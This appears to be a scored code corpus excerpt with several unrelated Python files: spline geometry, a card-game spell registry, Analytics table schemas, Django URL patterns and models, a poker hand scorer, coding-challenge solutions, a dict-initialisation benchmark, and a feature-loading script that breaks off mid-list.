f.write("POINTS %d float\n" % npt)
if self.cdim == 2:
ptformat = "%e %e 0.0\n"
elif self.cdim == 3:
ptformat = "%e %e %e\n"
for cpt in self.cp_coors:
f.write(ptformat % tuple(cpt))
cells = nm.array([nm.arange(0, ncp[0] - 1), nm.arange(1, ncp[0])]).T
cp = ncp[0]
nc = cp - 1
for ii in range(1, self.cdim):
cells1 = []
ncpi = ncp[ii]
for jj in range(ncpi):
cells1.append(cells + jj * cp)
nc = nc * ncpi
cells = nm.array([nm.arange(0, ncpi - 1),
nm.arange(1, ncpi)]).T * cp
for jj in range(cp):
cells1.append(cells + jj)
nc += (ncpi - 1) * cp
cells = nm.vstack(cells1)
cp *= ncp[ii]
f.write("\nCELLS %d %d\n" % (nc, 3 * nc))
for ii in cells:
f.write("2 %d %d\n" % tuple(ii))
f.write("\nCELL_TYPES %d\n" % nc)
f.write("3\n" * nc)
f.write("\nPOINT_DATA %d\n" % npt)
for ival in range(self.cp_values.shape[1]):
f.write("\nSCALARS cp_value_%d float 1\n" % (ival + 1))
f.write("LOOKUP_TABLE default\n")
            f.write('\n'.join('%e' % v for v in self.cp_values[:, ival]) + '\n')
f.close()
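# Hedged usage sketch (added; the values are hypothetical): wrap a 2D
# point cloud in a spline box, move one control point and evaluate
# the deformed coordinates.
#
#   spb = SplineBox([[0., 1.], [0., 1.]], coors, nsg=[2, 2])
#   spb.move_control_point([1, 1], [0.05, 0.0])
#   new_coors = spb.evaluate()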
class SplineRegion2D(SplineBox):
"""
B-spline geometry parametrization. The boundary of the SplineRegion2D
is defined by BSpline curves.
"""
@staticmethod
def points_in_poly(points, poly, tol=1e-6):
"""
Find which points are located inside the polygon.
"""
poly = nm.array(poly)
points = nm.array(points)
        inside = nm.zeros((points.shape[0],), dtype=bool)
p1 = poly[:-1]
p2 = poly[1:]
a1 = (p2[:, 1] - p1[:, 1])
a1nz = nm.where(nm.fabs(a1) > 1e-16)[0]
a2 = (p2[a1nz, 0] - p1[a1nz, 0]) / a1[a1nz]
for jj, pt in enumerate(points):
# on edges?
if nm.any(nm.linalg.norm(p1 - pt, axis=1) +
nm.linalg.norm(p2 - pt, axis=1) -
nm.linalg.norm(p1 - p2, axis=1) < tol):
inside[jj] = True
continue
# inside?
val = nm.logical_and(
(p1[a1nz, 1] > pt[1]) != (p2[a1nz, 1] > pt[1]),
pt[0] < (a2*(pt[1] - p1[a1nz, 1]) + p1[a1nz, 0]))
if (nm.where(val)[0].shape[0] % 2) > 0:
inside[jj] = True
return nm.where(inside)[0]
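    # Note (added): points_in_poly implements the even-odd ray-casting
    # rule: a point is inside if a horizontal ray from it crosses the
    # polygon boundary an odd number of times; points lying on an edge
    # (within tol) are treated as inside as well.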
@staticmethod
def define_control_points(cp_bnd_coors, ncp):
"""
Find positions of "inner" control points depending on boundary splines.
"""
nx, ny = ncp
grid = nm.zeros(ncp, dtype=nm.int32)
grid.T.flat = nm.arange(nx * ny)
coors = nm.zeros((nx * ny, 2), dtype=nm.float64)
idxs1 = nm.arange(nx)
idxs2 = nm.arange(1, ny - 1) * nx
bcnd = nm.hstack([idxs1, idxs2 + nx - 1,
idxs1[::-1] + nx * (ny - 1), idxs2[::-1]])
coors[bcnd, :] = cp_bnd_coors
for ii in range(1, nx - 1):
for jj, t in enumerate(nm.linspace(0, 1, ny)[1:-1]):
c = (1 - t) * coors[ii, :] + t * coors[ii + (ny - 1)*nx, :]
coors[ii + nx*(jj + 1), :] = c
inside = grid[1:-1, 1:-1].flatten()
for iiter in range(5):
for ii in inside:
dx = nm.array([0., 0.])
for jj in [-1, +1, -nx, + nx]:
dx -= 0.25 * (coors[ii, :] - coors[ii + jj, :])
coors[ii] += 0.1 * dx
return coors
@staticmethod
def create_spb(spl_bnd, coors, rho=10):
"""
Initialize SplineBox knots, control points, base functions, ...
"""
dim = 2
if coors.shape[1] != dim:
            print('Only 2D SplineRegion2D is supported!')
raise(ValueError)
bnd_poly = []
bnd_cp = []
for s in spl_bnd:
s.set_param_n(rho)
bnd_poly.append(s.eval()[:-1])
bnd_cp.append(s.get_control_points()[:-1, :])
bnd_poly.append(bnd_poly[0][0, :])
ncpoints = 1
base, bspl, uidx, ncp = [], [], [], []
for idim, si in enumerate([0, 1]):
s = spl_bnd[si]
bspl0 = BSpline(s.degree, ncp=s.ncp)
bspl0.set_knot_vector(s.knots)
bspl.append(bspl0)
base.append(None)
uidx.append(None)
ncp.append(s.ncp)
ncpoints *= s.ncp
cp_idx, mul_cp_idx = SplineBox.gen_cp_idxs(ncp)
cp_coors = SplineRegion2D.define_control_points(nm.vstack(bnd_cp), ncp)
idxs_inside = SplineRegion2D.points_in_poly(coors, nm.vstack(bnd_poly))
return {'base': base,
'bspl': bspl,
'uidx': uidx,
'ncp': ncp,
'cp_idx': cp_idx,
'mul_cp_idx': mul_cp_idx,
'cp_coors': cp_coors,
'idxs_inside': idxs_inside}
def find_ts(self, coors):
"""
        Find the spline parameters (t, s) corresponding to the given points (coors).
"""
from scipy.optimize import minimize
def ptdist(x, coors, spb):
for ii in range(spb.cdim):
spb.base[ii] = spb.bspl[ii].eval_basis(t=x[ii],
return_val=True)
coors_approx = spb.evaluate(outside=False)
return nm.linalg.norm(coors - coors_approx)
def gen_grid(spb, rho):
grid = nm.mgrid[0:rho, 0:rho]
t = nm.linspace(0, 1, rho)
for ii in range(spb.cdim):
spb.uidx[ii] = grid[ii, :].reshape(rho**self.cdim, order='F')
spb.base[ii] = spb.bspl[ii].eval_basis(t=t, return_val=True)
return spb.evaluate(outside=False)
rho = 100
grid = gen_grid(self, rho)
for ii in range(self.cdim):
self.uidx[ii] = nm.array([0])
ts = nm.zeros((coors.shape[0], self.cdim), dtype=nm.float64)
for ii, ic in enumerate(coors):
idx = nm.argmin(nm.linalg.norm(grid - ic, axis=1))
x0 = nm.array([idx % rho, idx // rho]) / (rho - 1.)
ts[ii] = minimize(lambda x: ptdist(x, ic, self), x0,
method='nelder-mead',
options={'xtol': 1e-5, 'disp': False}).x
return ts
def __init__(self, spl_bnd, coors, rho=1e3):
"""
Create a SplineBox which boundary is defined by B-spline curves.
Parameters
----------
spl_bnd : list
The list of BSpline objects (counterclockwise)
defining the SplineBox boundary.
coors : array
The coordinates of the mesh nodes.
rho : float
The density of points defining the boundary polygon.
"""
coors = nm.asarray(coors)
self.__dict__.update(self.create_spb(spl_bnd, coors, rho))
self.cdim = coors.shape[1]
self.coors = coors.copy()
self.field = self.coors
self.cp_values = self.cp_coors
self.ts = self.find_ts(coors[self.idxs_inside, :])
for idim in range(self.cdim):
ucoors, ucoors_idx = nm.unique(self.ts[:, idim],
return_inverse=True)
self.base[idim] = self.bspl[idim].eval_basis(t=ucoors,
return_val=True)
self.uidx[idim] = ucoors_idx
| 2.203125 | 2 |
server/spells/__init__.py | zorlu/cards2-server | 0 | 12770017 |
from .hpdp import HpDpSpell
from .damage import DamageSpell
from .hp import HpSpell
from .dp import DpSpell
from .draw import DrawSpell
from .execute import ExecuteSpell
from .swap import SwapSpell
from .restore import RestoreSpell
from .aura import AuraSpell
from .buff_add import AddBuffSpell
from .buff_remove import RemoveBuffSpell
from .switch_side import SwitchSideSpell
from .return_hand import ReturnHandSpell
from .shuffle import ShuffleSpell
from .summon import SummonSpell
from .transform import TransformSpell
# Map spell keys to their classes so dispatch is a single dict lookup.
SPELL_CLASSES = {
    "hp": HpSpell,
    "dp": DpSpell,
    "hpdp": HpDpSpell,
    "damage": DamageSpell,
    "draw": DrawSpell,
    "execute": ExecuteSpell,
    "swaphpdp": SwapSpell,
    "restore": RestoreSpell,
    "aura": AuraSpell,
    "addbuff": AddBuffSpell,
    "removebuff": RemoveBuffSpell,
    "control": SwitchSideSpell,
    "returnhand": ReturnHandSpell,
    "shuffle": ShuffleSpell,
    "summon": SummonSpell,
    "transform": TransformSpell,
}
def get_spell_class(spell_key):
    # Unknown keys return None.
    return SPELL_CLASSES.get(spell_key)
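# Illustrative lookup (constructor arguments for the spell classes are
# server-specific and not shown here):
#   spell_cls = get_spell_class("damage")
#   if spell_cls is not None:
#       spell = spell_cls(...)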
| 1.921875 | 2 |
__init__.py | brennanmcfarland/arctic-flaming-monkey-typhoon | 0 | 12770018 |
import os
import sys
sys.path.append(os.path.abspath('./arc23'))
| 1.328125 | 1 |
starthinker/task/ga_settings_download/ga_schemas.py | viohman/starthinker | 0 | 12770019 | ###########################################################################
#
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
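# The dictionaries below are BigQuery-style table schemas: lists of field
# definitions (name/type, with RECORD and REPEATED for nested fields) for
# the Google Analytics settings tables written by this task.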
CUSTOM_DIMENSION_SCHEMA = [{
'name': 'accountName',
'type': 'STRING'
}, {
'name': 'accountId',
'type': 'STRING'
}, {
'name': 'propertyName',
'type': 'STRING'
}, {
'name': 'propertyId',
'type': 'STRING'
}, {
'name': 'id',
'type': 'STRING'
}, {
'name': 'name',
'type': 'STRING'
}, {
'name': 'index',
'type': 'STRING'
}, {
'name': 'scope',
'type': 'STRING'
}, {
'name': 'active',
'type': 'STRING'
}, {
'name': 'created',
'type': 'TIMESTAMP'
}, {
'name': 'updated',
'type': 'TIMESTAMP'
}, {
'name': 'date',
'type': 'DATE'
}, {
'name': 'selfLink',
'type': 'STRING'
}]
CUSTOM_METRIC_SCHEMA = [{
'name': 'accountName',
'type': 'STRING'
}, {
'name': 'accountId',
'type': 'STRING'
}, {
'name': 'propertyName',
'type': 'STRING'
}, {
'name': 'propertyId',
'type': 'STRING'
}, {
'name': 'id',
'type': 'STRING'
}, {
'name': 'name',
'type': 'STRING'
}, {
'name': 'index',
'type': 'STRING'
}, {
'name': 'scope',
'type': 'STRING'
}, {
'name': 'active',
'type': 'STRING'
}, {
'name': 'created',
'type': 'TIMESTAMP'
}, {
'name': 'updated',
'type': 'TIMESTAMP'
}, {
'name': 'date',
'type': 'DATE'
}, {
'name': 'selfLink',
'type': 'STRING'
}, {
'name': 'type',
'type': 'STRING'
}, {
'name': 'min_value',
'type': 'INTEGER'
}, {
'name': 'max_value',
'type': 'INTEGER'
}]
VIEW_SCHEMA = [{
'name': 'date',
'type': 'DATE'
}, {
'name': 'id',
'type': 'STRING'
}, {
'name': 'selfLink',
'type': 'STRING'
}, {
'name': 'accountId',
'type': 'STRING'
}, {
'name': 'webPropertyId',
'type': 'STRING'
}, {
'name': 'accountName',
'type': 'STRING'
}, {
'name': 'webPropertyName',
'type': 'STRING'
}, {
'name': 'name',
'type': 'STRING'
}, {
'name': 'currency',
'type': 'STRING'
}, {
'name': 'timezone',
'type': 'STRING'
}, {
'name': 'websiteUrl',
'type': 'STRING'
}, {
'name': 'defaultPage',
'type': 'STRING'
}, {
'name': 'excludeQueryParameters',
'type': 'STRING'
}, {
'name': 'siteSearchQueryParameters',
'type': 'STRING'
}, {
'name': 'stripSiteSearchQueryParameters',
'type': 'BOOLEAN'
}, {
'name': 'siteSearchCategoryParameters',
'type': 'STRING'
}, {
'name': 'stripSiteSearchCategoryParameters',
'type': 'BOOLEAN'
}, {
'name': 'type',
'type': 'STRING'
}, {
'name': 'created',
'type': 'TIMESTAMP'
}, {
'name': 'updated',
'type': 'TIMESTAMP'
}, {
'name': 'eCommerceTracking',
'type': 'BOOLEAN'
}, {
'name': 'enhancedECommerceTracking',
'type': 'BOOLEAN'
}, {
'name': 'botFilteringEnabled',
'type': 'BOOLEAN'
}, {
'name': 'starred',
'type': 'BOOLEAN'
}]
GOAL_SCHEMA = [{
'name': 'date',
'type': 'DATE'
}, {
'name': 'id',
'type': 'STRING'
}, {
'name': 'accountId',
'type': 'STRING'
}, {
'name': 'webPropertyId',
'type': 'STRING'
}, {
'name': 'internalWebPropertyId',
'type': 'STRING'
}, {
'name': 'profileId',
'type': 'STRING'
}, {
'name': 'name',
'type': 'STRING'
}, {
'name': 'accountName',
'type': 'STRING'
}, {
'name': 'webPropertyName',
'type': 'STRING'
}, {
'name': 'profileName',
'type': 'STRING'
}, {
'name': 'value',
'type': 'FLOAT'
}, {
'name': 'active',
'type': 'BOOLEAN'
}, {
'name': 'type',
'type': 'STRING'
}, {
'name': 'created',
'type': 'TIMESTAMP'
}, {
'name': 'updated',
'type': 'TIMESTAMP'
}, {
'name':
'urlDestinationDetails',
'type':
'RECORD',
'fields': [{
'name': 'url',
'type': 'STRING'
}, {
'name': 'caseSensitive',
'type': 'BOOLEAN'
}, {
'name': 'matchType',
'type': 'STRING'
}, {
'name': 'firstStepRequired',
'type': 'BOOLEAN'
}, {
'name':
'steps',
'type':
'RECORD',
'mode':
'REPEATED',
'fields': [{
'name': 'number',
'type': 'INTEGER'
}, {
'name': 'name',
'type': 'STRING'
}, {
'name': 'url',
'type': 'STRING'
}]
}]
}, {
'name':
'visitTimeOnSiteDetails',
'type':
'RECORD',
'fields': [{
'name': 'comparisonType',
'type': 'STRING'
}, {
'name': 'comparisonValue',
'type': 'STRING'
}]
}, {
'name':
'visitNumPagesDetails',
'type':
'RECORD',
'fields': [{
'name': 'comparisonType',
'type': 'STRING'
}, {
'name': 'comparisonValue',
'type': 'STRING'
}]
}, {
'name':
'eventDetails',
'type':
'RECORD',
'fields': [{
'name': 'useEventValue',
'type': 'BOOLEAN'
}, {
'name':
'eventConditions',
'mode':
'REPEATED',
'type':
'RECORD',
'fields': [{
'name': 'type',
'type': 'STRING'
}, {
'name': 'matchType',
'type': 'STRING'
}, {
'name': 'expression',
'type': 'STRING'
}, {
'name': 'comparisonType',
'type': 'STRING'
}, {
'name': 'comparisonValue',
'type': 'STRING'
}]
}]
}]
GOOGLE_ADS_LINK_SCHEMA = [{
'name': 'date',
'type': 'DATE'
}, {
'name': 'id',
'type': 'STRING'
}, {
'name': 'kind',
'type': 'STRING'
}, {
'name': 'selfLink',
'type': 'STRING'
}, {
'name':
'entity',
'type':
'RECORD',
'fields': [{
'name':
'webPropertyRef',
'type':
'RECORD',
'fields': [{
'name': 'id',
'type': 'STRING'
}, {
'name': 'kind',
'type': 'STRING'
}, {
'name': 'href',
'type': 'STRING'
}, {
'name': 'accountId',
'type': 'STRING'
}, {
'name': 'internalWebPropertyId',
'type': 'STRING'
}, {
'name': 'name',
'type': 'STRING'
}]
}]
}, {
'name':
'adWordsAccounts',
'type':
'RECORD',
'mode':
'REPEATED',
'fields': [{
'name': 'kind',
'type': 'STRING'
}, {
'name': 'customerId',
'type': 'STRING'
}, {
'name': 'autoTaggingEnabled',
'type': 'BOOLEAN'
}]
}, {
'name': 'name',
'type': 'STRING'
}, {
'name': 'profileIds',
'type': 'RECORD',
'mode': 'REPEATED',
'fields': [{
'name': 'id',
'type': 'STRING'
}]
}]
REMARKETING_AUDIENCE_SCHEMA = [{
'name': 'date',
'type': 'DATE'
}, {
'name': 'kind',
'type': 'STRING'
}, {
'name': 'id',
'type': 'STRING'
}, {
'name': 'accountId',
'type': 'STRING'
}, {
'name': 'webPropertyId',
'type': 'STRING'
}, {
'name': 'webPropertyName',
'type': 'STRING'
}, {
'name': 'accountName',
'type': 'STRING'
}, {
'name': 'internalWebPropertyId',
'type': 'STRING'
}, {
'name': 'created',
'type': 'TIMESTAMP'
}, {
'name': 'updated',
'type': 'TIMESTAMP'
}, {
'name': 'name',
'type': 'STRING'
}, {
'name': 'description',
'type': 'STRING'
}, {
'name':
'linkedAdAccounts',
'mode':
'REPEATED',
'type':
'RECORD',
'fields': [{
'name': 'kind',
'type': 'STRING'
}, {
'name': 'id',
'type': 'STRING'
}, {
'name': 'accountId',
'type': 'STRING'
}, {
'name': 'webPropertyId',
'type': 'STRING'
}, {
'name': 'internalWebPropertyId',
'type': 'STRING'
}, {
'name': 'remarketingAudienceId',
'type': 'STRING'
}, {
'name': 'linkedAccountId',
'type': 'STRING'
}, {
'name': 'type',
'type': 'STRING'
}, {
'name': 'status',
'type': 'STRING'
}, {
'name': 'eligibleForSearch',
'type': 'BOOLEAN'
}]
}, {
'name': 'linkedViews',
'type': 'RECORD',
'mode': 'REPEATED',
'fields': [{
'name': 'id',
'type': 'STRING'
}]
}, {
'name': 'audienceType',
'type': 'STRING'
}, {
'name':
'audienceDefinition',
'type':
'RECORD',
'fields': [{
'name':
'includeConditions',
'type':
'RECORD',
'fields': [{
'name': 'kind',
'type': 'STRING'
}, {
'name': 'isSmartList',
'type': 'BOOLEAN'
}, {
'name': 'segment',
'type': 'STRING'
}, {
'name': 'membershipDurationDays',
'type': 'INTEGER'
}, {
'name': 'daysToLookBack',
'type': 'INTEGER'
}]
}]
}, {
'name':
'stateBasedAudienceDefinition',
'type':
'RECORD',
'fields': [{
'name':
'includeConditions',
'type':
'RECORD',
'fields': [{
'name': 'kind',
'type': 'STRING'
}, {
'name': 'isSmartList',
'type': 'BOOLEAN'
}, {
'name': 'segment',
'type': 'STRING'
}, {
'name': 'membershipDurationDays',
'type': 'INTEGER'
}, {
'name': 'daysToLookBack',
'type': 'INTEGER'
}]
}, {
'name':
'excludeConditions',
'type':
'RECORD',
'fields': [{
'name': 'segment',
'type': 'STRING'
}, {
'name': 'exclusionDuration',
'type': 'STRING'
}]
}]
}]
ACCOUNT_SUMMARIES_SCHEMA = [{
'name': 'date',
'type': 'DATE'
}, {
'name': 'id',
'type': 'STRING'
}, {
'name': 'kind',
'type': 'STRING'
}, {
'name': 'name',
'type': 'STRING'
}, {
'name': 'starred',
'type': 'BOOLEAN'
}, {
'name':
'webProperties',
'type':
'RECORD',
'mode':
'REPEATED',
'fields': [{
'name': 'kind',
'type': 'STRING'
}, {
'name': 'id',
'type': 'STRING'
}, {
'name': 'name',
'type': 'STRING'
}, {
'name': 'internalWebPropertyId',
'type': 'STRING'
}, {
'name': 'level',
'type': 'STRING'
}, {
'name': 'websiteUrl',
'type': 'STRING'
}, {
'name': 'starred',
'type': 'BOOLEAN'
}, {
'name':
'profiles',
'type':
'RECORD',
'mode':
'REPEATED',
'fields': [
{
'name': 'kind',
'type': 'STRING'
},
{
'name': 'id',
'type': 'STRING'
},
{
'name': 'name',
'type': 'STRING'
},
{
'name': 'type',
'type': 'STRING'
},
{
'name': 'starred',
'type': 'BOOLEAN'
},
]
}]
}]
| 1.210938 | 1 |
pyramidal/urls.py | gofflab/neuron-seq-site | 0 | 12770020 | from django.conf.urls import patterns, url
from pyramidal import views
urlpatterns = patterns('',
#Index
url(r'^$',views.index,name='index'),
#Geneset Views
url(r'^geneset/(?P<gene_list>[a-zA-Z0-9_\-\.\+]+)/?$',views.geneset,name='gene_set'),
#Isoform Views
url(r'^genes?/(?P<gene_id>[\w.-]+)/isoforms?/?$',views.geneIsoforms,name='isoform_index'),
url(r'^genes?/(?P<gene_id>[\w.-]+)/isoforms?/(?P<isoform_id>[\w.]+)/?$',views.isoformDetail,name='isoform_show'),
#Isoform Data
url(r'^genes?/(?P<gene_id>[\w.-]+)/isoforms?/(?P<isoform_id>[\w.]+)/hivedata/?$',views.isoformHiveData,name='isoform_hive_data'),
url(r'^genes?/(?P<gene_id>[\w.-]+)/isoforms?/(?P<isoform_id>[\w.]+)/expression/?$',views.isoformExpression,name='isoform_expression'),
#Gene detail view
url(r'^genes?/(?P<gene_id>[\w.-]+)/?$',views.geneShow,name='gene_show'),
#Gene Data
url(r'^genes?/(?P<gene_id>[\w.-]+)/hivedata/?$',views.geneHiveData,name='gene_hive_data'),
url(r'^genes?/(?P<gene_id>[\w.-]+)/expression/?$',views.geneExpression,name='gene_expression'),
# #Gene Data
# url(r'^genes?/(?P<gene_id>[\w.-]+)/hivedata/?$',views.geneHiveData,name='gene_hive_data'),
# url(r'^genes?/(?P<gene_id>[\w.-]+)/expression/?$',views.geneExpression,name='gene_expression'),
#All Genes
url(r'^genes/?$',views.geneIndex,name='gene_index'),
#Cluster Views
url(r'^clusters/?$',views.clusterIndex,name='cluster_index'),
url(r'^clusters/(?P<cluster_id>\d+)/?$',views.clusterShow,name='cluster_show'),
#Search
url(r'^search/?$', views.search, name = 'search'),
#Dev
url(r'^dev/$',views.dev),
#Markers
url(r'^markers/?$',views.markers,name = 'markers'),
#Supplement
url(r'^supp/?$',views.supplement,name = 'supplement'),
#TFBS
url(r'^tfbs/?$',views.tfbs,name = 'tfbs'),
#help
url(r'^help/?$',views.help,name = 'help'),
#Devel
url(r'^devel/?$',views.devel,name='devel'),
#About
url(r'^about/?$',views.about,name='about'),
)
| 1.820313 | 2 |
master_india_project/master_india_app/models.py | bikash-pal/master_india_assignment | 0 | 12770021 | from django.db import models
# Create your models here.
class Categories(models.Model):
catagorie=models.CharField(max_length=100)
class SubCatagories(models.Model):
#question = models.ForeignKey(Question, on_delete=models.CASCADE)
subCatagories=models.CharField(max_length=100)
class Products(models.Model):
#question = models.ForeignKey(Question, on_delete=models.CASCADE)
products=models.CharField(max_length=100)
| 2.4375 | 2 |
poker/texas_holdem/score_hand.py | jrj92280/python-kata | 3 | 12770022 | def score_hand(player_one: list, player_two: list):
if len(player_one) != 7 or len(player_two) != 7:
raise RuntimeError('invalid hands')
# pairs
player_one_pairs = player_one[1]
player_two_pairs = player_two[1]
player_one_has_pairs = len(player_one_pairs)
player_two_has_pairs = len(player_two_pairs)
if player_one_has_pairs and not player_two_has_pairs:
return 1
elif not player_one_has_pairs and player_two_has_pairs:
return -1
elif player_one_has_pairs and player_two_has_pairs:
make_list_same_size(player_one_pairs, player_two_pairs)
player_one_pairs, player_two_pairs = get_high_values(player_one_pairs, player_two_pairs)
player_one_pairs = player_one_pairs if len(player_one_pairs) < 3 else player_one_pairs[:2]
player_two_pairs = player_two_pairs if len(player_two_pairs) < 3 else player_two_pairs[:2]
# get highest two pairs
if len(player_one_pairs) != len(player_two_pairs):
return 1 if len(player_one_pairs) > len(player_two_pairs) else -1
for player_one_pair_value, player_two_pair_value in zip(player_one_pairs, player_two_pairs):
if player_one_pair_value > player_two_pair_value:
return 1
elif player_one_pair_value < player_two_pair_value:
return -1
# high cards
player_one_high_cards = player_one[0]
player_two_high_cards = player_two[0]
for player_one_card, player_two_card in zip(player_one_high_cards, player_two_high_cards):
player_one_card_value = get_card_value(player_one_card)
player_two_card_value = get_card_value(player_two_card)
if player_one_card_value == player_two_card_value:
continue
elif player_one_card_value > player_two_card_value:
return 1
else:
return -1
return 0
def get_high_values(player_one_pairs, player_two_pairs):
player_one_values = []
player_two_values = []
for player_one_pair, player_two_pair in zip(player_one_pairs, player_two_pairs):
player_one_has_pairs = len(player_one_pair)
player_two_has_pairs = len(player_two_pair)
player_one_current_value = get_card_value(player_one_pair[0]) if player_one_has_pairs else 0
player_two_current_value = get_card_value(player_two_pair[0]) if player_two_has_pairs else 0
if player_one_current_value:
player_one_values.append(player_one_current_value)
if player_two_current_value:
player_two_values.append(player_two_current_value)
player_one_values.sort(reverse=True)
player_two_values.sort(reverse=True)
return player_one_values, player_two_values
def make_list_same_size(list_one: list, list_two: list) -> None:
length_list_one = len(list_one)
length_list_two = len(list_two)
while length_list_one != length_list_two:
if length_list_one > length_list_two:
list_two.append([])
length_list_two += 1
else:
list_one.append([])
length_list_one += 1
def get_card_value(card):
return int(card[1:])
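# Cards are assumed to be encoded as a suit letter followed by the numeric
# rank, e.g. 'H13' for the king of hearts, so get_card_value('H13') == 13.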
| 3.765625 | 4 |
HackerRank/PythonHackerRankSolutions/BuiltIns/Zipped.py | accidentalgenius09/competitive-programming-solution | 8 | 12770023 |
'''
Title : Zipped!
Subdomain : Built-Ins
Domain : Python
Author : codeperfectplus
Created : 17 January 2020
'''
# Enter your code here. Read input from STDIN. Print output to STDOUT
n, x = map(int, input().split())
sheet = []
for _ in range(x):
sheet.append(map(float, input().split()) )
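# zip(*sheet) transposes the x subject rows into n per-student columns, so
# each tuple i holds one student's marks across all subjects.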
for i in zip(*sheet):
print( sum(i)/len(i) )
| 3 | 3 |
airflow/constants.py | vishwas78/python-workflow-test | 0 | 12770024 | PROJECT_NAME = "rtheta-central"
BUCKET_NAME = "central.rtheta.in"
ZONE = "asia-south1-a"
| 1.132813 | 1 |
sortsearch/ferriswheel.py | ashutoshdumiyan/CSES-Solutions | 0 | 12770025 | from sys import stdin
n, x = map(int, stdin.readline().split())
li = [int(c) for c in stdin.readline().split()]
li.sort()
res = 0
i = 0
j = n - 1
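# Two-pointer greedy: pair the lightest remaining child with the heaviest;
# if together they exceed the gondola limit x, the heaviest rides alone.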
while i <= j:
if li[i] + li[j] > x:
j -= 1
else:
i += 1
j -= 1
res += 1
print(res)
| 2.671875 | 3 |
dict_of_dicts_init.py | denis-ryzhkov/timeit_ab | 0 | 12770026 | #!/usr/bin/env python
"""
A/B timeit test: dict of dicts init.
Output:
exists = False:
speedup seconds option
15% 0.780859 in else
11% 0.821429 defaultdict
10% 0.825422 not in
3% 0.890609 get
0% 0.918161 setdefault
-83% 1.683932 try
exists = True:
speedup seconds option
21% 0.619301 defaultdict
19% 0.634981 try
13% 0.679612 not in
13% 0.681775 in else
5% 0.743055 get
0% 0.779458 setdefault
Result:
* If you want to control when to avoid auto-init on read
(e.g. after explicit delete of k1),
then use "in else" option:
if k1 in d:
d[k1][k2] = v
else:
d[k1] = {k2: v}
* If it fits code better, "not in" option is almost as good:
if k1 not in d:
d[k1] = {}
d[k1][k2] = v
* But if you are OK with auto-init in all cases,
then "defaultdict" is the best option - both fast and DRY:
from collections import defaultdict
d = defaultdict(dict)
d[k1][k2] = v
* While it looks like minus one lookup,
"get" option has almost no effect:
vs = d.get(k1)
if vs is None:
d[k1] = {k2: v}
else:
vs[k2] = v
* Never use "try" option:
it is very slow when k1 does not exist,
and slower than defaultdict when k1 exists:
try:
d[k1][k2] = v
except KeyError:
d[k1] = {k2: v}
* "setdefault" option creates new dict each time,
so it is very bad both for memory and speed:
d.setdefault(k1, {})[k2] = v
Copyright (C) 2017 by <NAME> <<EMAIL>>
MIT License, see http://opensource.org/licenses/MIT
"""
### import
import gc
import time
### config
envs = [
'exists = False',
'exists = True',
]
k1 = 'k1'
k2 = 'k2'
v = 'v'
d1 = {'k' + str(i): {} for i in xrange(10**6)}
defaults = dict(
init_once='pass',
init_each='pass',
repeat=10**6,
)
tests = [
dict(
name='setdefault',
init_once='d = d1.copy()',
init_each='if not exists: del d[k1]',
measure='d.setdefault(k1, {})[k2] = v',
),
dict(
name='defaultdict',
init_once='''
from collections import defaultdict
d = defaultdict(dict, d1)
''',
init_each='if not exists: del d[k1]',
measure='d[k1][k2] = v',
),
dict(
name='not in',
init_once='d = d1.copy()',
init_each='if not exists: del d[k1]',
measure='''
if k1 not in d:
d[k1] = {}
d[k1][k2] = v
''',
),
dict(
name='in else',
init_once='d = d1.copy()',
init_each='if not exists: del d[k1]',
measure='''
if k1 in d:
d[k1][k2] = v
else:
d[k1] = {k2: v}
''',
),
dict(
name='get',
init_once='d = d1.copy()',
init_each='if not exists: del d[k1]',
measure='''
vs = d.get(k1)
if vs is None:
d[k1] = {k2: v}
else:
vs[k2] = v
''',
),
dict(
name='try',
init_once='d = d1.copy()',
init_each='if not exists: del d[k1]',
measure='''
try:
d[k1][k2] = v
except KeyError:
d[k1] = {k2: v}
''',
),
]
### main
def main():
gc.disable()
for env in envs:
print('\n{}:'.format(env))
exec(env)
results = []
base_seconds = None
for test in tests:
init_once = compile(test.get('init_once') or defaults['init_once'], '<string>', 'exec')
init_each = compile(test.get('init_each') or defaults['init_each'], '<string>', 'exec')
measure = compile(test['measure'], '<string>', 'exec')
repeat = test.get('repeat') or defaults['repeat']
exec(init_once)
seconds = 0
for _ in xrange(repeat):
exec(init_each)
start = time.time()
exec(measure)
seconds += time.time() - start
results.append((seconds, test['name']))
if base_seconds is None:
base_seconds = seconds
print('speedup seconds option')
for seconds, name in sorted(results):
print('{:6d}% {:.6f} {}'.format(
int(round(100 * (base_seconds - seconds) / base_seconds)),
seconds,
name,
))
if __name__ == '__main__':
main()
| 3.21875 | 3 |
Test/trainValues.py | ADMoreau/Software-Assurance-Defect-Localization | 1 | 12770027 |
import csv
from difflib import SequenceMatcher
trainInit = []
testInit = []
############LISTS OF IMPORTED FEATURES#############################
temp1 = open('90filteredOMITGOOD.csv','r')
data1 = csv.reader((line.replace('\0','') for line in temp1), delimiter = '\n')
OMITGOODFEATS = list(data1)
temp2 = open('90filteredOMITBAD.csv','r')
data2 = csv.reader((line.replace('\0','') for line in temp2), delimiter = '\n')
OMITBADFEATS = list(data2)
trainFeats = OMITGOODFEATS + OMITBADFEATS
#################################IMPORT TRAIN AND TEST DOCS#######################################
def first_data_line(path):
    # Skip the header line and return the first data line of the file.
    with open(path) as handle:
        return handle.readlines()[1:][0]
# OMITBAD documents are loaded first, then OMITGOOD.
for name in ['OMITBAD_TRAIN_200.txt', 'OMITBAD_TRAIN_3.txt',
             'OMITBAD_TRAIN_361.txt', 'OMITBAD_TRAIN_25.txt',
             'OMITBAD_TRAIN_428.txt']:
    trainInit.append(first_data_line(name))
for name in ['OMITBAD_TEST_16.txt', 'OMITBAD_TEST_27.txt',
             'OMITBAD_TEST_70.txt', 'OMITBAD_TEST_208.txt',
             'OMITBAD_TEST_173.txt']:
    testInit.append(first_data_line(name))
for name in ['OMITGOOD_TRAIN_57.txt', 'OMITGOOD_TRAIN_193.txt',
             'OMITGOOD_TRAIN_253.txt', 'OMITGOOD_TRAIN_315.txt',
             'OMITGOOD_TRAIN_193.txt']:
    trainInit.append(first_data_line(name))
for name in ['OMITGOOD_TEST_15.txt', 'OMITGOOD_TEST_87.txt',
             'OMITGOOD_TEST_263.txt', 'OMITGOOD_TEST_491.txt',
